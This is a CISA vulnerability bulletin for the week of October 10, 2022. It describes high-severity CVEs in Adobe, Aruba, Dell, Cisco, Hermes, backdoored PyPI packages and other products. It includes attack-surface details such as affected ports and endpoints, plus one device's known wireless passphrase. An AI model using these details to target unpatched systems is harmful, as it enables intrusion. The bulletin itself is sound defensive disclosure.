CISA encourages users and administrators to review Cisco Advisory cisco-sa-ise-path-trav-Dz5dpzyM and apply the necessary updates.


Vulnerability Summary for the Week of October 10, 2022

Original release date: October 17, 2022 | Last revised: October 18, 2022


High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adobe — acrobat_reader Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-42339
MISC
adobe — acrobat_reader Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38450
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Use of Hard-coded Credentials vulnerability that could result in application denial-of-service by gaining access to start/stop arbitrary services. Exploitation of this issue does not require user interaction. 2022-10-14 7.5 CVE-2022-38420
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in information disclosure. Exploitation of this issue does not require user interaction. 2022-10-14 7.5 CVE-2022-38422
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction. 2022-10-14 7.5 CVE-2022-42340
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction. 2022-10-14 7.5 CVE-2022-42341
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server. 2022-10-14 9.8 CVE-2022-35710
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server. 2022-10-14 9.8 CVE-2022-35711
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server. 2022-10-14 9.8 CVE-2022-35712
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. 2022-10-14 9.8 CVE-2022-38418
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, but does require administrator privileges. 2022-10-14 7.2 CVE-2022-38421
MISC
adobe — coldfusion Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary file system write. Exploitation of this issue does not require user interaction, but does require administrator privileges. 2022-10-14 7.2 CVE-2022-38424
MISC
adobe — commerce Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by a Stored Cross-site Scripting vulnerability. Exploitation of this issue does not require user interaction and could result in a post-authentication arbitrary code execution. 2022-10-14 10 CVE-2022-35698
MISC
adobe — dimension Adobe Dimension version 3.4.5 is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38440
MISC
adobe — dimension Adobe Dimension version 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38442
MISC
adobe — dimension Adobe Dimension version 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38446
MISC
adobe — dimension Adobe Dimension version 3.4.5 is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38441
MISC
adobe — dimension Adobe Dimension version 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38447
MISC
adobe — dimension Adobe Dimension version 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 7.8 CVE-2022-38448
MISC
apache — shiro Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher. 2022-10-12 9.8 CVE-2022-40664
CONFIRM
MLIST
MLIST
MLIST
arraynetworks — arrayos_ag Array Networks AG/vxAG with ArrayOS AG before 9.4.0.469 allows unauthenticated command injection that leads to privilege escalation and control of the system. NOTE: ArrayOS AG 10.x is unaffected. 2022-10-13 9.8 CVE-2022-42897
MISC
MISC
arubanetworks — instant There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address these security vulnerabilities. 2022-10-07 9.8 CVE-2022-37885
MISC
arubanetworks — instant There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address these security vulnerabilities. 2022-10-07 9.8 CVE-2022-37886
MISC
arubanetworks — instant There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address these security vulnerabilities. 2022-10-07 9.8 CVE-2022-37887
MISC
arubanetworks — instant There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address these security vulnerabilities. 2022-10-07 9.8 CVE-2022-37889
MISC
arubanetworks — instant Unauthenticated buffer overflow vulnerabilities exist within the Aruba InstantOS and ArubaOS 10 web management interface. Successful exploitation results in the execution of arbitrary commands on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address these security vulnerabilities. 2022-10-07 9.8 CVE-2022-37890
MISC
arubanetworks — instant Unauthenticated buffer overflow vulnerabilities exist within the Aruba InstantOS and ArubaOS 10 web management interface. Successful exploitation results in the execution of arbitrary commands on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address these security vulnerabilities. 2022-10-07 9.8 CVE-2022-37891
MISC
arubanetworks — instant An authenticated command injection vulnerability exists in the Aruba InstantOS and ArubaOS 10 command line interface. Successful exploitation of this vulnerability results in the ability to execute arbitrary commands as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InstantOS that address this security vulnerability. 2022-10-07 7.8 CVE-2022-37893
MISC
autodesk — revit A maliciously crafted TIF, PICT, TGA, or RLC file in Autodesk Image Processing component may be forced to read beyond allocated boundaries when parsing the TIFF, PICT, TGA, or RLC files. This vulnerability may be exploited to execute arbitrary code. 2022-10-07 7.8 CVE-2021-40162
MISC
autodesk — revit A Memory Corruption vulnerability may lead to code execution through maliciously crafted DLL files through Autodesk Image Processing component. 2022-10-07 7.8 CVE-2021-40163
MISC
autodesk — revit A heap-based buffer overflow could occur while parsing TIFF, PICT, TGA, or RLC files. This vulnerability may be exploited to execute arbitrary code. 2022-10-07 7.8 CVE-2021-40164
MISC
autodesk — revit A maliciously crafted TIFF, PICT, TGA, or RLC file in Autodesk Image Processing component may be used to write beyond the allocated buffer while parsing TIFF, PICT, TGA, or RLC files. This vulnerability may be exploited to execute arbitrary code. 2022-10-07 7.8 CVE-2021-40165
MISC
autodesk — revit A maliciously crafted PNG file in Autodesk Image Processing component may be used to attempt to free an object that has already been freed while parsing them. This vulnerability may be exploited by attackers to execute arbitrary code. 2022-10-07 7.8 CVE-2021-40166
MISC
bentley — microstation Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read and stack overflow issues when opening crafted SKP files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View. 2022-10-13 7.8 CVE-2022-42899
MISC
bentley — microstation Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read issues when opening crafted FBX files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View. 2022-10-13 7.8 CVE-2022-42900
MISC
bentley — microstation Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds and stack overflow issues when opening crafted XMT files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View. 2022-10-13 7.8 CVE-2022-42901
MISC
boodskap — iot_platform Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges via a crafted request sent to /api/user/upsert/<uuid>. 2022-10-13 8.8 CVE-2022-35135
MISC
browserify-shim_project — browserify-shim Prototype pollution vulnerability in function resolveShims in resolve-shims.js in thlorenz browserify-shim 3.8.15 via the k variable in resolve-shims.js. 2022-10-11 9.8 CVE-2022-37617
MISC
MISC
MISC
cassianetworks — access_controller An attacker may be able to use minify route with a relative path to view any file on the Cassia Networks Access Controller prior to 2.0.1. 2022-10-14 7.5 CVE-2021-22685
CONFIRM
CONFIRM
church_management_system_project — church_management_system An arbitrary file upload vulnerability in the /admin/admin_pic.php component of Church Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-12 7.2 CVE-2022-41406
MISC
cisco — ios A vulnerability in the SSH implementation of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker to cause an affected device to reload. This vulnerability is due to improper handling of resources during an exceptional situation. An attacker could exploit this vulnerability by continuously connecting to an affected device and sending specific SSH requests. A successful exploit could allow the attacker to cause the affected device to reload. 2022-10-10 7.7 CVE-2022-20920
CISCO
cisco — ios_xe A vulnerability in the DNS application layer gateway (ALG) functionality that is used by Network Address Translation (NAT) in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload. This vulnerability is due to a logic error that occurs when an affected device inspects certain TCP DNS packets. An attacker could exploit this vulnerability by sending crafted DNS packets through the affected device that is performing NAT for DNS packets. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition on the affected device. Note: This vulnerability can be exploited only by sending IPv4 TCP packets through an affected device. This vulnerability cannot be exploited by sending IPv6 traffic. 2022-10-10 8.6 CVE-2022-20837
CISCO
cisco — ios_xe A vulnerability in the egress MPLS packet processing function of Cisco IOS XE Software for Cisco Catalyst 3650, Catalyst 3850, and Catalyst 9000 Family Switches could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient input validation of IPv4 traffic. An attacker could exploit this vulnerability by sending a malformed packet out of an affected MPLS-enabled interface. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. 2022-10-10 8.6 CVE-2022-20870
CISCO
cisco — ios_xe A vulnerability in the implementation of IPv6 VPN over MPLS (6VPE) with Zone-Based Firewall (ZBFW) of Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper error handling of an IPv6 packet that is forwarded from an MPLS and ZBFW-enabled interface in a 6VPE deployment. An attacker could exploit this vulnerability by sending a crafted IPv6 packet sourced from a device on the IPv6-enabled virtual routing and forwarding (VRF) interface through the affected device. A successful exploit could allow the attacker to reload the device, resulting in a DoS condition. 2022-10-10 7.4 CVE-2022-20915
CISCO
clippercms — clippercms ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the rss_url_news parameter at /manager/index.php. 2022-10-13 9.8 CVE-2022-41495
MISC
clippercms — clippercms ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the pkg_url parameter at /manager/index.php. 2022-10-13 9.8 CVE-2022-41497
MISC
dedecms — dedecms DedeCMS V5.7.99 was discovered to contain an arbitrary file upload vulnerability via the component /dede/file_manage_control.php. 2022-10-12 7.2 CVE-2022-40921
MISC
dell — alienware_area-51_r5_firmware Dell BIOS contains a use of uninitialized variable vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2022-10-12 7.8 CVE-2022-34390
MISC
dell — alienware_area-51_r5_firmware Dell Client BIOS Versions prior to the remediated version contain an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2022-10-12 7.8 CVE-2022-34391
MISC
dell — alienware_area_51m_r1_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2022-10-12 7.8 CVE-2022-32485
MISC
dell — alienware_area_51m_r1_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2022-10-12 7.8 CVE-2022-32487
MISC
dell — alienware_area_51m_r1_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2022-10-12 7.8 CVE-2022-32488
MISC
dell — alienware_area_51m_r1_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2022-10-12 7.8 CVE-2022-32489
MISC
dell — alienware_area_51m_r1_firmware Dell Client BIOS contains a Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by manipulating an SMI to cause an arbitrary write during SMM. 2022-10-12 7.8 CVE-2022-32491
MISC
dell — alienware_area_51m_r1_firmware Dell BIOS contains a Stack-Based Buffer Overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2022-10-12 7.8 CVE-2022-32493
MISC
dell — bios Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2022-10-11 8.8 CVE-2022-32486
MISC
dell — bios Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. 2022-10-11 8.8 CVE-2022-32492
MISC
dell — container_storage_modules Dell Container Storage Modules 1.2 contains an Improper Limitation of a Pathname to a Restricted Directory in goiscsi and gobrick libraries which could lead to OS command injection. A remote unauthenticated attacker could exploit this vulnerability leading to unintentional access to path outside of restricted directory. 2022-10-11 8.8 CVE-2022-34426
MISC
dell — container_storage_modules Dell Container Storage Modules 1.2 contains an OS Command Injection in goiscsi and gobrick libraries. A remote unauthenticated attacker could exploit this vulnerability leading to modification of intended OS command execution. 2022-10-11 8.8 CVE-2022-34427
MISC
dell — enterprise_sonic_distribution Dell Enterprise SONiC OS, 4.0.0, 4.0.1, contain a cryptographic key vulnerability in SSH. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to unauthorized access to communication. 2022-10-10 7.5 CVE-2022-34425
MISC
dell — geodrive Dell GeoDrive, versions 2.1 – 2.2, contains an information disclosure vulnerability in GUI. An authenticated non-admin user could potentially exploit this vulnerability and view sensitive information. 2022-10-12 7.8 CVE-2022-33919
MISC
dell — geodrive Dell GeoDrive, versions prior to 2.2, contains an Unquoted File Path vulnerability. A low privilege attacker could potentially exploit this vulnerability, leading to the execution of arbitrary code in the SYSTEM security context. 2022-10-12 7.8 CVE-2022-33920
MISC
dell — geodrive Dell GeoDrive, versions prior to 2.2, contains Multiple DLL Hijacking Vulnerabilities. A low privilege attacker could potentially exploit this vulnerability, leading to the execution of arbitrary code in the SYSTEM security context. 2022-10-12 7.8 CVE-2022-33921
MISC
dell — geodrive Dell GeoDrive, versions prior to 2.2, contains Insecure File and Folder Permissions vulnerabilities. A low privilege attacker could potentially exploit this vulnerability, leading to the execution of arbitrary code in the SYSTEM security context. Dell recommends customers to upgrade at the earliest opportunity. 2022-10-12 7.8 CVE-2022-33922
MISC
dell — geodrive Dell GeoDrive, Versions 1.0 – 2.2, contain a Path Traversal Vulnerability in the reporting function. A local, low privileged attacker could potentially exploit this vulnerability, to gain unauthorized delete access to the files stored on the server filesystem, with the privileges of the GeoDrive service: NT AUTHORITY\SYSTEM. 2022-10-12 7.1 CVE-2022-33937
MISC
dell — hybrid_client Dell Hybrid Client below 1.8 version contains a gedit vulnerability. A guest attacker could potentially exploit this vulnerability, allowing deletion of user and some system files and folders. 2022-10-11 8.2 CVE-2022-34432
MISC
dell — hybrid_client Dell Hybrid Client below 1.8 version contains a Zip Bomb Vulnerability in UI. A guest privilege attacker could potentially exploit this vulnerability, leading to system files modification. 2022-10-11 7.5 CVE-2022-34430
MISC
dell — xtremio_management_server Dell EMC XtremIO versions prior to X2 6.4.0-22 contain a bruteforce vulnerability. A remote unauthenticated attacker can potentially exploit this vulnerability and gain access to an admin account. 2022-10-12 9.8 CVE-2022-31228
MISC
democritus — d8s-algorithms The d8s-algorithms package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-dicts package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-42040
MISC
MISC
MISC
democritus — d8s-archives The d8s-archives package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-41383
MISC
MISC
MISC
democritus — d8s-asns The d8s-asns package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-csv package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-42037
MISC
MISC
MISC
democritus — d8s-asns The d8s-asns package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-html package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-42044
MISC
MISC
MISC
democritus — d8s-domains The d8s-domains package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-41384
MISC
MISC
MISC
democritus — d8s-file-system The d8s-file-system package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hashes package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-42041
MISC
MISC
MISC
democritus — d8s-html The d8s-html package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-41385
MISC
MISC
MISC
democritus — d8s-ip-addresses The d8s-ip-addresses package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-csv package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-42038
MISC
MISC
MISC
democritus — d8s-json The d8s-json package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-41382
MISC
MISC
MISC
democritus — d8s-lists The d8s-lists package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-dicts package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-42039
MISC
MISC
MISC
democritus — d8s-networking The d8s-networking package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hashes package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-42042
MISC
MISC
MISC
democritus — d8s-pdfs The d8s-pdfs package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-41387
MISC
MISC
MISC
democritus — d8s-urls The d8s-urls package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-csv package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-42036
MISC
MISC
MISC
democritus — d8s-utility The d8s-utility package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-41381
MISC
MISC
MISC
democritus — d8s-utility The d8s-utility package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-41386
MISC
MISC
MISC
democritus — d8s-xml The d8s-xml package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-html package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-42043
MISC
MISC
MISC
democritus — d8s-yaml The d8s-yaml package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-file-system package. The affected version is 0.1.0. 2022-10-11 9.8 CVE-2022-41380
MISC
MISC
MISC
django-mfa2_project — django-mfa2 mfa/FIDO2.py in django-mfa2 before 2.5.1 and 2.6.x before 2.6.1 allows a replay attack that could be used to register another device for a user. The device registration challenge is not invalidated after usage. 2022-10-11 7.5 CVE-2022-42731
MISC
MISC
MISC
dolibarr — dolibarr_erp/crm Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then executed by eval. 2022-10-12 9.8 CVE-2022-40871
MISC
dotpdn — paint.net dotPDN Paint.NET before 4.1.2 allows Deserialization of Untrusted Data (issue 1 of 2). 2022-10-12 9.8 CVE-2018-18446
MISC
MISC
MISC
dotpdn — paint.net dotPDN Paint.NET before 4.1.2 allows Deserialization of Untrusted Data (issue 2 of 2). 2022-10-12 9.8 CVE-2018-18447
MISC
MISC
MISC
dropbear_ssh_project — dropbear_ssh An issue was discovered in Dropbear through 2020.81. Due to a non-RFC-compliant check of the available authentication methods in the client-side SSH code, it is possible for an SSH server to change the login process in its favor. This attack can bypass additional security measures such as FIDO2 tokens or SSH-Askpass. Thus, it allows an attacker to abuse a forwarded agent for logging on to another server unnoticed. 2022-10-12 7.5 CVE-2021-36369
MISC
MISC
MISC
f-secure — elements_endpoint_protection Multiple Denial-of-Service (DoS) vulnerability was discovered in F-Secure & WithSecure products whereby the aerdl.dll unpacker handler function crashes. This can lead to a possible scanning engine crash. 2022-10-12 7.5 CVE-2022-28887
MISC
MISC
facebook — hermes An out of bounds write in hermes, while handling large arrays, prior to commit 06eaec767e376bfdb883d912cb15e987ddf2bda1 allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected. 2022-10-11 9.8 CVE-2022-32234
CONFIRM
CONFIRM
facebook — hermes A write-what-where condition in hermes caused by an integer overflow, prior to commit 5b6255ae049fa4641791e47fad994e8e8c4da374 allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected. 2022-10-11 9.8 CVE-2022-35289
CONFIRM
CONFIRM
facebook — hermes An integer conversion error in Hermes bytecode generation, prior to commit 6aa825e480d48127b480b08d13adf70033237097, could have been used to perform Out-Of-Bounds operations and subsequently execute arbitrary code. Note that this is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected. 2022-10-11 9.8 CVE-2022-40138
CONFIRM
CONFIRM
fastify — fastify fastify is a fast and low overhead web framework, for Node.js. Affected versions of fastify are subject to a denial of service via malicious use of the Content-Type header. An attacker can send an invalid Content-Type header that can cause the application to crash. This issue has been addressed in commit `fbb07e8d` and will be included in release version 4.8.1. Users are advised to upgrade. Users unable to upgrade may manually filter out http content with malicious Content-Type headers. 2022-10-10 7.5 CVE-2022-39288
CONFIRM
MISC
MISC
foresightsports — gc3_launch_monitor_firmware Foresight GC3 Launch Monitor 1.3.15.68 ships with a Target Communication Framework (TCF) service enabled. This service listens on a TCP port on all interfaces and allows for process debugging, file system modification, and terminal access as the root user. In conjunction with a hosted wireless access point and the known passphrase of FSSPORTS, an attacker could use this service to modify a device and steal intellectual property. 2022-10-13 8 CVE-2022-40187
MISC
MISC
MISC
MISC
fortinet — fortios An improper neutralization of special elements used in an os command (‘os command injection’) in Fortinet FortiOS version 6.0.0 through 6.0.14, FortiOS version 6.2.0 through 6.2.10, FortiOS version 6.4.0 through 6.4.8, FortiOS version 7.0.0 through 7.0.3 allows attacker to execute privileged commands on a linked FortiSwitch via diagnostic CLI commands. 2022-10-10 8 CVE-2021-44171
CONFIRM
freerdp — freerdp FreeRDP is a free remote desktop protocol library and clients. FreeRDP based clients on unix systems using `/parallel` command line switch might read uninitialized data and send it to the server the client is currently connected to. FreeRDP based server implementations are not affected. Please upgrade to 2.8.1 where this issue is patched. If unable to upgrade, do not use parallel port redirection (`/parallel` command line switch) as a workaround. 2022-10-12 7.5 CVE-2022-39282
MISC
CONFIRM
freerdp — freerdp FreeRDP is a free remote desktop protocol library and clients. All FreeRDP based clients when using the `/video` command line switch might read uninitialized data, decode it as audio/video and display the result. FreeRDP based server implementations are not affected. This issue has been patched in version 2.8.1. If you cannot upgrade do not use the `/video` switch. 2022-10-12 7.5 CVE-2022-39283
MISC
CONFIRM
gh-pages_project — gh-pages Prototype pollution vulnerability in tschaub gh-pages 3.1.0 via the partial variable in util.js. 2022-10-12 9.8 CVE-2022-37611
MISC
MISC
MISC
gogs — gogs
In Gogs, versions v0.6.5 through v0.12.10 are vulnerable to Stored Cross-Site Scripting (XSS) that leads to an account takeover. 2022-10-11 9 CVE-2022-32174
MISC
MISC
